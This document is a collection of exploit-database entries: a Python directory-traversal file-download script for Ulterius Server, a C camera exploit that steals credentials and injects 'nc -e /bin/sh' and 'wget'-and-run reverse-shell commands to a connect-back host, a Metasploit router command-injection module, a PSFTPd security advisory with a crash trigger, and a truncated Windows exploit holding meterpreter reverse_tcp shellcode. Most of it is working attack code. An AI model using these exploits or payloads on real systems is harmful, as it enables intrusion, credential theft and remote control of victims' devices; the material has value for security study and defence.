# Exploit Title: Ulterius Server < 1.9.5.0 Directory Traversal Arbitrary File Access
# Date: 11/13/2017
# Exploit Author: Rick Osgood
# Vendor Homepage: https://ulterius.io/
# Software Link: https://github.com/Ulterius/server/tree/0e4f2113da287aac88a8b4c5f8364a03685d393d
# Version: < 1.9.5.0
# Tested on: Windows Server 2012 R2
# CVE : CVE-2017-16806
#
# You can download almost any file that resides on the same drive letter as the Ulterius server.
# Example: http://ulteriusURL:22006/.../.../.../.../.../.../.../.../.../windows/win.ini
#
# Unfortunately, you need to know the path to the file you want to download.
# Fortunately, Ulterius indexes every file on the system, and it's usually stored in the same place:
# http://ulteriusURL:2206/.../fileIndex.db
#
# This script will retrieve the fileIndex.db file for you, decompress it, and process the list to
# make it human readable. Then you can use the same script to download any juicy files you find.
#
# Ulterius writes the following to the fileIndex.db file:
# First four bytes are a timestamp so we can ignore this
# The next four items repeat until the end of the file:
# filename.length (4 bytes?)
# filename
# directory.length (4 bytes?)
# directory
import requests
import sys
import argparse
import zlib
import struct
# This function grabs the filename or file path from the fileIndex
def processChunk(i, data):
    """Read one length-prefixed string from ``data`` starting at offset ``i``.

    Args:
        i: Byte offset of the 4-byte length field.
        data: Decompressed fileIndex.db contents as a Python 2 ``str``
            (``struct.unpack('B', data[i])`` needs a 1-byte string, and the
            module uses ``print`` statements).

    Returns:
        ``(next_offset, value)``: the offset just past the string and the
        string itself.
    """
    # NOTE(review): the four length bytes are summed (max 1020), not combined
    # positionally, so this is not a 32-bit decode; the module header itself
    # marks the field width as uncertain ("4 bytes?").
    length = struct.unpack('B', data[i])[0]
    length += struct.unpack('B', data[i+1])[0]
    length += struct.unpack('B', data[i+2])[0]
    length += struct.unpack('B', data[i+3])[0]
    i += 4
    # A slice past the end of data silently returns a short string; the
    # caller's `while i < len(data)` does not guarantee i+4 is in range.
    filename = data[i:i+length]
    i += length
    return i, filename
# Main function
def main():
    """Command-line entry point: fetch one file and/or the fileIndex.db listing.

    ``url`` (positional) is the server base URL including the port; only the
    first value is used.  ``--retrieve FILEPATH`` saves that file into the
    current directory under a name with backslashes replaced by ``_``.
    ``--index`` downloads fileIndex.db, inflates it and writes a
    one-path-per-line listing to ./fileIndex.db.  Neither output file is
    explicitly closed; the HTTP status code is never checked, so an error
    page is written as if it were the requested file.
    """
    # Parse arguments
    parser = argparse.ArgumentParser(description='Ulterius exploit by Rick osgood')
    parser.add_argument('url', type=str, nargs='+', help='URL of the Ulterius server including port')
    parser.add_argument('--retrieve', metavar='FILEPATH', type=str, nargs='+', help='Retrieve file from server (e.g. c:\windows\win.ini)')
    parser.add_argument('--index', help='Retrieve, decompress, and process fileIndex.db (List of all files indexed by Ulterius)', action='store_true')
    args = parser.parse_args()
    # We are going to retrieve a specified file
    if args.retrieve:
        fileName = str(args.retrieve[0])
        # This works for the default Ulterius install directory.
        # Each ".../" is one traversal step from the web root (see the module
        # header); the number of steps is tied to the default install path.
        baseDir = "/.../.../.../.../.../.../.../.../.../"
        # Remove slashes from output file name
        outFile = fileName.replace('\\','_')
        # Remove drive letter and change slashes
        if ":\\" in fileName[:3]:
            fileName = fileName[3:]
        # Replace slashes
        fileName = fileName.replace('\\','/') # Replace slashes
        # Build URL
        url = str(args.url[0]) + baseDir + fileName
        print "Retrieving " + url
        # Download file
        r = requests.get(url=url, stream=True) # Retrieve file
        # Write file
        # NOTE(review): opened in text mode 'w' and never closed; if the
        # script runs on Windows, binary content gets newline translation.
        f = open(outFile, 'w')
        f.write(r.content)
    # We are going to download the fileIndex.db file
    if args.index:
        # Setup the URL
        url = args.url[0] + "/.../fileIndex.db"
        print "Downloading " + url
        # Download file
        r = requests.get(url=url, stream=True)
        # decompress the data
        # wbits=-15 selects a raw DEFLATE stream (no zlib header); anything
        # else in the body (e.g. an HTML error page) raises zlib.error.
        data = zlib.decompress( r.content, -15 )
        # Open output file for writing
        f = open('fileIndex.db', 'w')
        # Strip off header info (not sure what this is)
        # NOTE(review): the module header describes a 4-byte timestamp, but 8
        # bytes are skipped here; the format notes are explicitly uncertain.
        data = data[8:]
        # Process file names and write to output file
        i = 0
        while i < len(data):
            i, filename = processChunk(i, data) # Get file name
            i, directory = processChunk(i, data) # Get file path
            i += 8 # Skip the FFFFFFFFFFFFFFFF
            f.write(directory + '\\' + filename + '\n') # Write to output file
# Script entry point; all argument handling lives in main().
if __name__ == "__main__":
    main()
// Exploit-DB Note ~ Source: https://pierrekim.github.io/advisories/expl-goahead-camera.c
// Exploit-DB Note ~ Credit: https://pierrekim.github.io/blog/2017-03-08-camera-goahead-0day.html
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#define CAM_PORT 80                 /* camera's HTTP (GoAhead) listener */
#define REMOTE_HOST "192.168.1.1"   /* compile-time connect-back address; not a CLI option */
#define REMOTE_PORT "1337"          /* compile-time connect-back port (see the nc hint in main) */
/*
 * Request templates.  Each is a printf format with two %s slots that rce()
 * fills with the login and password recovered by creds().  The pwd= field
 * of the FTP settings carries the injected command; main() sends PAYLOAD_0
 * ("planting"), PAYLOAD_1 ("executing") and PAYLOAD_2 ("cleaning", which
 * replaces pwd= with a plain value).  The ALTERNATIVE_* variants differ
 * from PAYLOAD_0 only in how that command is encoded.
 */
#define PAYLOAD_0 "GET /set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=$(nc%20" REMOTE_HOST "+" REMOTE_PORT "%20-e/bin/sh)&dir=/&mode=PORT&upload_interval=0\r\n\r\n"
#define PAYLOAD_1 "GET /ftptest.cgi?next_url=test_ftp.htm&loginuse=%s&loginpas=%s\r\n\r\n"
#define PAYLOAD_2 "GET /set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=passpasspasspasspasspasspasspasspass&dir=/&mode=PORT&upload_interval=0\r\n\r\n"
#define ALTERNATIVE_PAYLOAD_zero0 "GET /set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=$(nc+" REMOTE_HOST "+" REMOTE_PORT "+-e/bin/sh)&dir=/&mode=PORT&upload_interval=0\r\n\r\n"
#define ALTERNATIVE_PAYLOAD_zero1 "GET /set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=$(wget+http://" REMOTE_HOST "/stufz&&./stuff)&dir=/&mode=PORT&upload_interval=0\r\n\r\n"
/* Fetches /system.ini and returns a calloc'd 64-byte buffer: login at
 * offset 0, password at offset 32 (main prints `id` and `id + 32`), or NULL
 * on failure.  With get_config != 0 it dumps the raw response and exit()s. */
char * creds(char *argv,
             int get_config);
/* Formats one request template with the credentials and sends it.
 * Returns 0 on success, 1 on any error.  Never closes its socket. */
int rce(char *argv,
        char *id,
        char attack[],
        char desc[]);
/*
 * Entry point.
 *   argv[1]  target camera IPv4 address (dotted quad, parsed by inet_pton)
 *   argv[2]  optional "--get-config": creds() prints the raw response and exits
 * Returns 1 on usage error or when creds() fails, 0 otherwise.  envp is unused.
 * Each rce() result only gates a "done" message; a failed step does not stop
 * the remaining ones.
 */
int main(int argc,
         char **argv,
         char **envp)
{
    char *id;

    printf("Camera 0day root RCE with connect-back @PierreKimSec\n\n");
    if (argc < 2)
    {
        printf("%s target\n", argv[0]);
        printf("%s target --get-config will dump the configuration and exit\n", argv[0]);
        return (1);
    }
    if (argc == 2)
        printf("Please run `nc -vlp %s` on %s\n\n", REMOTE_PORT, REMOTE_HOST);
    if (argc == 3 && !strcmp(argv[2], "--get-config"))
        id = creds(argv[1], 1);
    else
        id = creds(argv[1], 0);
    if (id == NULL)
    {
        printf("exploit failed\n");
        return (1);
    }
    printf("done\n");
    /* creds() lays out login at id[0..31] and password at id[32..63]. */
    printf(" login = %s\n", id);
    printf(" pass = %s\n", id + 32);
    if (!rce(argv[1], id, PAYLOAD_0, "planting"))
        printf("done\n");
    sleep(1);
    if (!rce(argv[1], id, PAYLOAD_1, "executing"))
        printf("done\n");
    if (!rce(argv[1], id, PAYLOAD_2, "cleaning"))
        printf("done\n");
    if (!rce(argv[1], id, PAYLOAD_1, "cleaning"))
        printf("done\n");
    printf("[+] enjoy your root shell on %s:%s\n", REMOTE_HOST, REMOTE_PORT);
    /* id (calloc'd in creds) is never freed; the process ends here. */
    return (0);
}
/*
 * Requests /system.ini from the camera (the unauthenticated configuration
 * leak) and extracts the credentials from the binary response.
 *   argv        target IPv4 address
 *   get_config  non-zero: print the raw response (up to 10 KiB) and exit(0)
 * Returns a calloc'd 64-byte buffer, login at [0], password at [32], or
 * NULL.  The caller owns the buffer.
 *
 * Review notes (the response is untrusted input to this client):
 *  - the socket fd is leaked on every early-return path;
 *  - tmp comes from malloc(): bytes never received are uninitialized, and
 *    the marker scan below runs to 10 KiB regardless of n_total;
 *  - strcat() copies from tmp with no length bound into the 64-byte `out`,
 *    so a response without a NUL within 32 bytes of each field overflows
 *    the heap buffer of this program, under the server's control;
 *  - memset with '0' fills serv_addr with 0x30 bytes, not zeros.
 */
char * creds(char *argv,
             int get_config)
{
    int sock;
    int n;
    struct sockaddr_in serv_addr;
    char buf[8192] = { 0 };
    char *out;
    char *tmp;
    char payload[] = "GET /system.ini?loginuse&loginpas HTTP/1.0\r\n\r\n";
    int old_n;
    int n_total;

    sock = 0;
    n = 0;
    old_n = 0;
    n_total = 0;
    printf("[+] bypassing auth ... ");
    if ((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0)
    {
        printf("Error while creating socket\n");
        return (NULL);
    }
    /* '0' is the character 0x30, not a zero byte; family, port and address
     * are assigned explicitly below, sin_zero keeps the 0x30 fill. */
    memset(&serv_addr, '0', sizeof(serv_addr));
    serv_addr.sin_family = AF_INET;
    serv_addr.sin_port = htons(CAM_PORT);
    if (inet_pton(AF_INET, argv, &serv_addr.sin_addr) <= 0)
    {
        printf("Error while inet_pton\n");
        return (NULL);              /* sock leaked */
    }
    if (connect(sock, (struct sockaddr *)&serv_addr , sizeof(serv_addr)) < 0)
    {
        printf("creds: connect failed\n");
        return (NULL);              /* sock leaked */
    }
    if (send(sock, payload, strlen(payload) , 0) < 0)
    {
        printf("creds: send failed\n");
        return (NULL);              /* sock leaked */
    }
    /* tmp is malloc'd, not zeroed: anything past the received bytes is
     * uninitialized, and nothing NUL-terminates the data. */
    if (!(tmp = malloc(10 * 1024 * sizeof(char))))
        return (NULL);
    /* out: login at [0..31], password at [32..63]; calloc zeroes it so the
     * strcat() calls below append to empty strings. */
    if (!(out = calloc(64, sizeof(char))))
        return (NULL);              /* tmp and sock leaked */
    /* Copy the response into tmp while the total stays under 10 KiB.
     * NOTE(review): old_n holds the previous chunk's length, not a running
     * offset, so the third and later chunks are written at that length
     * rather than after the data already copied.  `n >= 0` is always true
     * inside this loop because the condition requires n > 0. */
    while ((n = recv(sock, buf, sizeof(buf), 0)) > 0)
    {
        n_total += n;
        if (n_total < 1024 * 10)
            memcpy(tmp + old_n, buf, n);
        if (n >= 0)
            old_n = n;
    }
    close(sock);
    /*
    [ HTTP HEADERS ]
    ...
    000????: 0000 0a0a 0a0a 01.. .... .... .... ....
                  ^^^^ ^^^^ ^^
                  Useful reference in the binary data
                  in order to to find the positions of
                  credentials
    ...
    ...
    0000690: 6164 6d69 6e00 0000 0000 0000 0000 0000 admin...........
    00006a0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
    00006b0: 6164 6d69 6e00 0000 0000 0000 0000 0000 admin...........
    00006c0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
    ...
    NOTE: reference can be too:
    000????: 0006 0606 0606 0100 000a .... .... ....
    Other method: parse everything, find the "admin" string and extract the associated password
    by adding 31bytes after the address of 'a'[dmin].
    Works if the login is admin (seems to be this by default, but can be changed by the user)
    */
    /* --get-config: echo the received bytes and terminate the process
     * (tmp is not freed; exit() ends the program). */
    if (get_config)
    {
        for (unsigned int j = 0; j < n_total && j < 10 * 1024; j++)
            printf("%c", tmp[j]);
        exit (0);
    }
    /* Scan for the 0a 0a 0a 0a 01 marker described above.  The bound is the
     * buffer size, not n_total, so uninitialized bytes are inspected too. */
    for (unsigned int j = 50; j < 10 * 1024; j++)
    {
        if (tmp[j - 4] == 0x0a &&
            tmp[j - 3] == 0x0a &&
            tmp[j - 2] == 0x0a &&
            tmp[j - 1] == 0x0a &&
            tmp[j] == 0x01)
        {
            if (j + 170 < 10 * 1024)
            {
                /* Fixed offsets from the marker: login at +138, password at
                 * +170.  No length bound: if no NUL occurs within 32 bytes of
                 * either field, the 64-byte `out` overflows. */
                strcat(out, &tmp[j + 138]);
                strcat(out + 32 * sizeof(char), &tmp[j + 170]);
                free(tmp);
                return (out);
            }
        }
    }
    free(tmp);
    return (NULL);                  /* out leaked */
}
/*
 * Formats one request template with the credentials and sends it.
 *   argv    target IPv4 address
 *   id      64-byte buffer from creds(): login at 0, password at 32
 *   attack  printf format (one of the PAYLOAD_* macros) with two %s slots
 *   desc    label for the progress message
 * Returns 0 on success, 1 on any error.
 * Review notes: the socket is never closed and `payload` is never freed, on
 * success or failure; sprintf() into the 512-byte buffer is unbounded and
 * stays in range only while the formats are short and each credential field
 * is under 32 bytes (creds() does not enforce that).  No response is read.
 */
int rce(char *argv,
        char *id,
        char attack[],
        char desc[])
{
    int sock;
    struct sockaddr_in serv_addr;
    char *payload;

    /* Zeroed 512-byte buffer for the formatted request; never freed. */
    if (!(payload = calloc(512, sizeof(char))))
        return (1);
    sock = 0;
    printf("[+] %s payload ... ", desc);
    if ((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0)
    {
        printf("Error while creating socket\n");
        return (1);
    }
    /* Same '0' (0x30) fill as in creds(); the used fields are set below. */
    memset(&serv_addr, '0', sizeof(serv_addr));
    serv_addr.sin_family = AF_INET;
    serv_addr.sin_port = htons(CAM_PORT);
    if (inet_pton(AF_INET, argv, &serv_addr.sin_addr) <= 0)
    {
        printf("Error while inet_pton\n");
        return (1);                 /* sock leaked */
    }
    if (connect(sock, (struct sockaddr *)&serv_addr , sizeof(serv_addr)) < 0)
    {
        printf("rce: connect failed\n");
        return (1);                 /* sock leaked */
    }
    /* Unbounded format into payload[512]; see the header note. */
    sprintf(payload, attack, id, id + 32);
    if (send(sock, payload, strlen(payload) , 0) < 0)
    {
        printf("rce: send failed\n");
        return (1);
    }
    /* Socket left open; the server's reply is never read. */
    return (0);
}
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'openssl'
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Report
  include Msf::Exploit::CmdStager

  # Module metadata.  The chain as implemented below: unauthenticated
  # credential disclosure through hedwig.cgi (retrieve_creds), HMAC-MD5
  # challenge login (login), then command injection through the NTP server
  # setting (execute_command), driven by the wget CmdStager.
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'DIR-850L (Un)authenticated OS Command Exec',
      'Description' => %q{
This module leverages an unauthenticated credential disclosure
vulnerability to then execute arbitrary commands on DIR-850L routers
as an authenticated user. Unable to use Meterpreter payloads.
},
      'Author' => [
        'Mumbai', # https://github.com/realoriginal (module)
        'Zdenda' # vuln discovery
      ],
      'References' => [
        ['URL', 'https://www.seebug.org/vuldb/ssvid-96333'],
        ['URL', 'https://blogs.securiteam.com/index.php/archives/3310'],
      ],
      'DisclosureDate' => 'Aug 9 2017',
      'License' => MSF_LICENSE,
      'Platform' => 'linux',
      'Arch' => ARCH_MIPSBE,
      'DefaultTarget' => 0,
      'DefaultOptions' => {
        'PAYLOAD' => 'linux/mipsbe/shell/reverse_tcp'
      },
      'Privileged' => true,
      'Payload' => {
        'DisableNops' => true,
      },
      'Targets' => [[ 'Automatic', {} ]],
    ))
  end

  # Fingerprints the device from the Server header of GET /.  A DIR-850L
  # banner containing WEBACCESS/1.0 is reported Safe; any other DIR-850L
  # banner is Detected.  A missing header, another device or a connection
  # error all yield Unknown.
  def check
    begin
      res = send_request_cgi({
        'uri' => '/',
        'method' => 'GET'
      })
      if res && res.headers['Server']
        auth = res.headers['Server']
        if auth =~ /DIR-850L/
          if auth =~ /WEBACCESS\/1\.0/
            return Exploit::CheckCode::Safe
          else
            return Exploit::CheckCode::Detected
          end
        end
      end
    rescue ::Rex::ConnectionError
      return Exploit::CheckCode::Unknown
    end
    Exploit::CheckCode::Unknown
  end

  # Records a username/password pair in the credential database.
  # opts keys: :ip, :port, :service_name, :user, :password, :proof.
  # NOTE(review): not called anywhere in this module; retrieve_creds stores
  # the raw response as loot instead of reporting the credential.
  def report_cred(opts)
    service_data = {
      address: opts[:ip],
      port: opts[:port],
      service_name: opts[:service_name],
      protocol: 'tcp',
      workspace_id: myworkspace_id
    }
    credential_data = {
      origin_type: :service,
      module_fullname: fullname,
      username: opts[:user],
      private_data: opts[:password],
      private_type: :password
    }.merge(service_data)
    login_data = {
      core: create_credential(credential_data),
      status: Metasploit::Model::Login::Status::UNTRIED,
      proof: opts[:proof]
    }.merge(service_data)
    create_credential_login(login_data)
  end

  # some other DIR-8X series routers are vulnerable to this same retrieve creds vuln as well...
  # should write an auxiliary module to-do -> WRITE AUXILIARY
  #
  # Unauthenticated credential disclosure: the <service> element posted to
  # hedwig.cgi traverses to DEVICE.ACCOUNT.xml, whose <name>/<password>
  # elements come back although the uid cookie is only a random placeholder.
  # Returns [username, password]; fail_with when no password element is
  # found or the connection fails.  The password is echoed by vprint_good.
  # NOTE(review): `res.body` is used without a nil check; when no response
  # arrives send_request_cgi returns nil and this raises NoMethodError
  # instead of reaching fail_with.
  def retrieve_creds
    begin
      xml = "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n"
      xml << "<postxml>\r\n"
      xml << "<module>\r\n"
      xml << " <service>../../../htdocs/webinc/getcfg/DEVICE.ACCOUNT.xml</service>\r\n"
      xml << "</module>\r\n"
      xml << "</postxml>"
      res = send_request_cgi({
        'uri' => '/hedwig.cgi',
        'method' => 'POST',
        'encode_params' => false,
        'headers' => {
          'Accept-Encoding' => 'gzip, deflate',
          'Accept' => '*/*'
        },
        'ctype' => 'text/xml',
        'cookie' => "uid=#{Rex::Text.rand_text_alpha_lower(8)}",
        'data' => xml,
      })
      if res.body =~ /<password>(.*)<\/password>/ # fixes stack trace issue
        parse = res.get_xml_document
        username = parse.at('//name').text
        password = parse.at('//password').text
        vprint_good("#{peer} - Retrieved the username/password combo #{username}/#{password}")
        loot = store_loot("dlink.dir850l.login", "text/plain", rhost, res.body)
        print_good("#{peer} - Downloaded credentials to #{loot}")
        return username, password
      else
        fail_with(Failure::NotFound, "#{peer} - Credentials could not be obtained")
      end
    rescue ::Rex::ConnectionError
      fail_with(Failure::Unknown, "#{peer} - Unable to connect to target.")
    end
  end

  # GET /authentication.cgi returns JSON carrying a session uid and a login
  # challenge; returns [uid, challenge].  Same nil-response caveat as
  # retrieve_creds (`res.get_json_document` on a nil res).
  def retrieve_uid
    begin
      res = send_request_cgi({
        'uri' => '/authentication.cgi',
        'method' => 'GET',
      })
      parse = res.get_json_document
      uid = parse['uid']
      challenge = parse['challenge']
      return uid, challenge
    rescue ::Rex::ConnectionError
      fail_with(Failure::Unknown, "#{peer} - Unable to connect to target.")
    end
  end

  # Authenticates the uid: HMAC-MD5 keyed with the password over
  # username + challenge, upper-cased hex, POSTed with the uid cookie.
  # Returns the uid.  The POST response is discarded, so a rejected login is
  # only noticed when the later command does not run.
  def login(username, password)
    uid, challenge = retrieve_uid
    begin
      hash = OpenSSL::HMAC.hexdigest(OpenSSL::Digest.new('md5'), password.to_s, (username.to_s + challenge.to_s)).upcase
      send_request_cgi({
        'uri' => '/authentication.cgi',
        'method' => 'POST',
        'data' => "id=#{username}&password=#{hash}",
        'cookie' => "uid=#{uid}"
      })
      return uid
    rescue ::Rex::ConnectionError
      fail_with(Failure::Unknown, "#{peer} - Unable to connect to target.")
    end
  end

  # CmdStager callback, invoked once per stager line.  Re-authenticates on
  # every call (see the inline note), places `cmd` inside the NTP <server>
  # element (backgrounded with `&`), saves it through hedwig.cgi and applies
  # it with pigwidgeon.cgi SETCFG,ACTIVATE.  Returns the pigwidgeon response;
  # the hedwig response is not inspected.  `opts` is unused.
  def execute_command(cmd, opts)
    uid = login(@username, @password) # reason being for loop is cause UID expires for some reason after executing 1 command
    payload = "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n"
    payload << "<postxml>\r\n"
    payload << "<module>\r\n"
    payload << " <service>DEVICE.TIME</service>\r\n"
    payload << " <device>\r\n"
    payload << " <time>\r\n"
    payload << " <ntp>\r\n"
    payload << " <enable>1</enable>\r\n"
    payload << " <period>604800</period>\r\n"
    payload << " <server>#{Rex::Text.rand_text_alpha_lower(8)}; (#{cmd}&); </server>\r\n"
    payload << " </ntp>\r\n"
    payload << " <ntp6>\r\n"
    payload << " <enable>1</enable>\r\n"
    payload << " <period>604800</period>\r\n"
    payload << " </ntp6>\r\n"
    payload << " <timezone>20</timezone>\r\n"
    payload << " <time/>\r\n"
    payload << " <date/>\r\n"
    payload << " <dst>0</dst>\r\n"
    payload << " <dstmanual/>\r\n"
    payload << " <dstoffset/>\r\n"
    payload << " </time>\r\n"
    payload << " </device>\r\n"
    payload << "</module>\r\n"
    payload << "</postxml>"
    begin
      # save configuration
      res = send_request_cgi({
        'uri' => '/hedwig.cgi',
        'method' => 'POST',
        'ctype' => 'text/xml',
        'data' => payload,
        'cookie' => "uid=#{uid}"
      })
      # execute configuration
      res = send_request_cgi({
        'uri' => '/pigwidgeon.cgi',
        'method' => 'POST',
        'data' => 'ACTIONS=SETCFG,ACTIVATE',
        'cookie' => "uid=#{uid}"
      })
      return res
    rescue ::Rex::ConnectionError
      fail_with(Failure::Unknown, "#{peer} - Unable to connect to target.")
    end
  end

  # Main flow: requires check to return Detected (a Safe or Unknown result
  # aborts), obtains credentials into @username/@password, then runs the
  # wget CmdStager with 200-byte lines via execute_command.
  def exploit
    print_status("#{peer} - Connecting to target...")
    unless check == Exploit::CheckCode::Detected
      fail_with(Failure::Unknown, "#{peer} - Failed to access vulnerable url")
    end
    #
    # Information Retrieval, obtains creds and logs in
    #
    @username, @password = retrieve_creds
    execute_cmdstager(
      :flavor => :wget,
      :linemax => 200
    )
  end
end
X41 D-Sec GmbH Security Advisory: X41-2017-006
Multiple Vulnerabilities in PSFTPd Windows FTP Server
=====================================================
Overview
--------
Confirmed Affected Versions: 10.0.4 Build 729
Confirmed Patched Versions: None
Vendor: Sergei Pleis Softwareentwicklung
Vendor URL: http://www.psftp.de/ftp-server/
Vector: Network
Credit: X41 D-Sec GmbH, Eric Sesterhenn, Markus Vervier
Status: Public
Advisory-URL: https://www.x41-dsec.de/lab/advisories/x41-2017-006-psftpd/
Summary and Impact
------------------
Several issues have been identified, which allow attackers to hide
information in log files, recover passwords and crash the whole server.
The software uses neither ASLR nor DEP, either of which would make exploitation harder.
Product Description
-------------------
From the vendor page, roughly translated:
PSFTPd is a userfriendly, functional and robust FTP server software with
support for FTP, FTPS and SFTP.
Use after free
==============
Severity Rating: High
Vector: Network
CVE: CVE-2017-15271
CWE: 416
CVSS Score: 7.5
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
Summary and Impact
------------------
An invalid memory access issue could be triggered remotely in the SFTP
component of PSFTPd. This issue could be triggered prior to authentication.
The PSFTPd server did not automatically restart, which enabled attackers
to perform a very effective DoS attack against this service. By sending
the following SSH identification / version string to the server, a NULL
pointer dereference could be triggered:
$ cat tmp.14
SSH-2.0-BBBBBBBB
CCCCCCCCCCCC
$ cat tmp.14 | socat - TCP:192.168.122.50:22
The issue appears to be a race condition in the window message handling
that performs the cleanup for invalid connections. Upon further
investigation X41 D-Sec GmbH could confirm that the accessed memory was
already freed.
X41 D-Sec GmbH enabled the memory debugging functionality page heap for
the psftpd_svc.exe executable using the command agflags.exe /p /disable
psftpd_svc.exe /fulla. When observing the crash in the WinDBG 19
debugging tool, it could be confirmed that access to an already freed
page was taking place.
Log Injection
=============
Severity Rating: Medium
Vector: Network
CVE: CVE-2017-15270
CWE: 117
CVSS Score: 5.3
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
Summary and Impact
------------------
The PSFTPd server does not properly escape data before writing it into a
Comma Separated Values (CSV) file. This can be used by attackers to hide
data in the Graphical User Interface (GUI) view and create arbitrary
entries to a certain extent.
Special characters such as '"', ',' and '\r' are not escaped and can be used
to add new entries to the log.
Workarounds
-----------
None
Passwords stored in Plain Text
==============================
Severity Rating: Low
Vector: Local
CVE: CVE-2017-15272
CWE: 312
CVSS Score: 3.3
CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
Summary and Impact
------------------
The PSFTPd server stores its configuration inside the PSFTPd.dat file. This
file is a Microsoft Access Database and can be extracted by using the
command "mdb-export PSFTPd.dat USERS" from mdbtools
(https://github.com/brianb/mdbtools). The application sets the encrypt
flag with the password "ITsILLEGAL", but this is not required to extract
the data.
The user's password is shown in clear text, since it is not stored securely.
Workarounds
-----------
Use the Active Directory connector for your users.
FTP Bounce Scan
===============
Severity Rating: Medium
Vector: Network
CVE: CVE-2017-15269
CWE: 441
CVSS Score: 5.0
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N
Summary and Impact
------------------
The PSFTPd server does not prevent FTP bounce scans by default.
These can be performed using "nmap -b" and allow scans to be carried out via
the FTP server.
Workarounds
-----------
It is possible to prevent FTP bounce scans by setting: Kontrollmanager >
Domain > Sicherheit > Register "FTP Bounce and FXP"
Workarounds
-----------
None
About X41 D-Sec GmbH
--------------------
X41 D-Sec is a provider of application security services. We focus on
application code reviews, design review and security testing. X41 D-Sec
GmbH was founded in 2015 by Markus Vervier. We support customers in
various industries such as finance, software development and public
institutions.
Timeline
--------
2017-08-31 Issues found
2017-09-18 Vendor contacted
2017-09-19 Vendor reply
2017-10-11 CVE IDs requested
2017-10-11 CVE IDs assigned
2017-11-06 Vendor informed us, that apparently a fixed version was
released. We cannot confirm, since we do not have
access.
2017-11-07 Public release
# Tested on Windows 10 (x86)
# The application requires to have the web server enabled.
# Exploit for older version: https://www.exploit-db.com/exploits/40832/
#!/usr/bin/python
import socket,os,time,struct,argparse
# Only the target host is a command-line option; the port is fixed below.
parser = argparse.ArgumentParser()
parser.add_argument('--host', required=True)
args = parser.parse_args()
host = args.host
port = 80
# root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.116.166 LPORT=4455 -b "\x00\x0a\x0d\x25\x26\x2b\x3d" -f py
# Encoded payload produced by the command above (bad bytes excluded).
# Python 2 str, used as raw bytes (the script uses print statements).
shellcode = ""
shellcode += "\xba\xb6\x9f\x39\x88\xd9\xf7\xd9\x74\x24\xf4\x5e\x31"
shellcode += "\xc9\xb1\x54\x83\xee\xfc\x31\x56\x0f\x03\x56\xb9\x7d"
shellcode += "\xcc\x74\x2d\x03\x2f\x85\xad\x64\xb9\x60\x9c\xa4\xdd"
shellcode += "\xe1\x8e\x14\x95\xa4\x22\xde\xfb\x5c\xb1\x92\xd3\x53"
shellcode += "\x72\x18\x02\x5d\x83\x31\x76\xfc\x07\x48\xab\xde\x36"
shellcode += "\x83\xbe\x1f\x7f\xfe\x33\x4d\x28\x74\xe1\x62\x5d\xc0"
shellcode += "\x3a\x08\x2d\xc4\x3a\xed\xe5\xe7\x6b\xa0\x7e\xbe\xab"
shellcode += "\x42\x53\xca\xe5\x5c\xb0\xf7\xbc\xd7\x02\x83\x3e\x3e"
shellcode += "\x5b\x6c\xec\x7f\x54\x9f\xec\xb8\x52\x40\x9b\xb0\xa1"
shellcode += "\xfd\x9c\x06\xd8\xd9\x29\x9d\x7a\xa9\x8a\x79\x7b\x7e"
shellcode += "\x4c\x09\x77\xcb\x1a\x55\x9b\xca\xcf\xed\xa7\x47\xee"
shellcode += "\x21\x2e\x13\xd5\xe5\x6b\xc7\x74\xbf\xd1\xa6\x89\xdf"
shellcode += "\xba\x17\x2c\xab\x56\x43\x5d\xf6\x3e\xa0\x6c\x09\xbe"
shellcode += "\xae\xe7\x7a\x8c\x71\x5c\x15\xbc\xfa\x7a\xe2\xc3\xd0"
shellcode += "\x3b\x7c\x3a\xdb\x3b\x54\xf8\x8f\x6b\xce\x29\xb0\xe7"
shellcode += "\x0e\xd6\x65\x9d\x04\x40\x2a\x72\x6d\x36\x5a\x71\x8d"
shellcode += "\x27\xfc\xfc\x6b\x17\x52\xaf\x23\xd7\x02\x0f\x94\xbf"
shellcode += "\x48\x80\xcb\xdf\x72\x4a\x64\x75\x9d\x23\xdc\xe1\x04"
shellcode += "\x6e\x96\x90\xc9\xa4\xd2\x92\x42\x4d\x22\x5c\xa3\x24"
shellcode += "\x30\x88\xd2\xc6\xc8\x48\x7f\xc7\xa2\x4c\x29\x90\x5a"
shellcode += "\x4e\x0c\xd6\xc4\xb1\x7b\x64\x02\x4d\xfa\x5d\x78\x7b"
shellcode += "\x68\xe2\x16\x83\x7c\xe2\xe6\xd5\x16\xe2\x8e\x81\x42"
shellcode += "\xb1\xab\xce\x5e\xa5\x67\x5a\x61\x9c\xd4\xcd\x09\x22"
shellcode += "\x02\x39\x96\xdd\x61\x3a\xd1\x22\xf7\x1e\x7a\x4b\x07"
shellcode += "\x1e\x7a\x8b\x6d\x9e\x2a\xe3\x7a\xb1\xc5\xc3\x83\x18"
